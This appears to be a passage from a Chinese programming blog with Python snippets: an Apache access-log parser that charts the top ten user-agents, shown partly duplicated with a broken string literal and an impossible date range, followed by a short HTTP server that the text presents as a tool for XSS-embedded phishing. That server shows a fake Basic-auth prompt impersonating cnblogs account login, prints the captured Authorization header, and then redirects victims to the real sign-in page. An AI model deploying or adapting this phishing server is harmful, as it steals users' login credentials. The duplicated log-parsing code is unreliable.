if data >="11/Apr/2020:07:03:56" and data <= "17/Mar/2020:14:16:25":
Agent.append(each.split()[13].replace("
",""))
except Exception:
pass
dic,list_num = {},set(Agent)
for item in list_num:
num = Agent.count(item)
dic[item] = num
# 针对字典中的键值对进行排序,大的在前小的在后
di = sorted(dic.items(),key=lambda x:x[1],reverse=True)
news = di[0:10:1] # 取前两个大的
dic_news = dict(news)
x,y = [],[]
for k in dic_news:
x.append(k)
y.append(dic_news[k])
plt.rcParams["font.sans-serif"] = ["KaiTi"]
plt.title("访问设备类型前10")
plt.xticks(rotation=70)
for a,b in zip(x,y):
plt.text(a, b, '%.0f' % b, ha='center', va= 'bottom',fontsize=7)
plt.bar(x,y)
plt.legend()
plt.show()
Count_Equipment("c://access_log","2020-03-11","2020-03-17")
import os,sys,re,time,datetime
from matplotlib.pylab import *
def Count_Equipment(log_name,start_time,end_time):
Agent = []
with open(log_name,"r",encoding="utf-8") as fp:
for each in fp.readlines():
try:
data = each.split()[3][1:]
start_time = time.strftime("%d/%b/%Y",time.localtime(time.mktime(time.strptime(start_time,"%Y-%m-%d"))))
end_time = time.strftime("%d/%b/%Y",time.localtime(time.mktime(time.strptime(end_time,"%Y-%m-%d"))))
if data.split(":")[0] >=start_time and data.split(":")[0] <= end_time:
Agent.append(each.split()[13].replace("
",""))
except Exception:
pass
dic,list_num = {},set(Agent)
# 合并字典设备类型是key 设备个数是value
for item in list_num:
num = Agent.count(item)
dic[item] = num
# 针对字典中的键值对进行排序,大的在前小的在后
item = sorted(dic.items(),key=lambda x:x[1],reverse=True)
dic_news = dict(item[0:10:1]) # 取设备数量最多的前10条记录
x,y = [],[]
for k in dic_news:
x.append(k)
y.append(dic_news[k])
plt.rcParams["font.sans-serif"] = ["KaiTi"]
plt.title("访问设备类型前10")
plt.xticks(rotation=70)
for a,b in zip(x,y):
plt.text(a, b, '%.0f' % b, ha='center', va= 'bottom',fontsize=7)
plt.bar(x,y)
plt.legend()
plt.show()
Count_Equipment("c://access_log","2020-03-11","2020-03-17")
构建简易HTTPBasic认证: Basic认证是由web服务器提供的一种轻便的身份校验方式,此处实现的工具可用于XSS内嵌钓鱼.
import socketserver
import http.server
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if str(self.headers).find('UserLogin=1') > 0:
self.send_response(302)
self.send_header('Location', 'https://account.cnblogs.com/signin')
self.end_headers()
else:
if str(self.headers).find('Authorization: Basic ') > 0:
self.send_response(302)
self.send_header('Set-Cookie', 'UserLogin=1')
self.send_header('Location', 'https://account.cnblogs.com/signin')
print("------------------------------------------------------------")
print(str(self.headers))
else:
self.send_response(401)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.send_header('WWW-Authenticate',
'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
self.end_headers()
httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()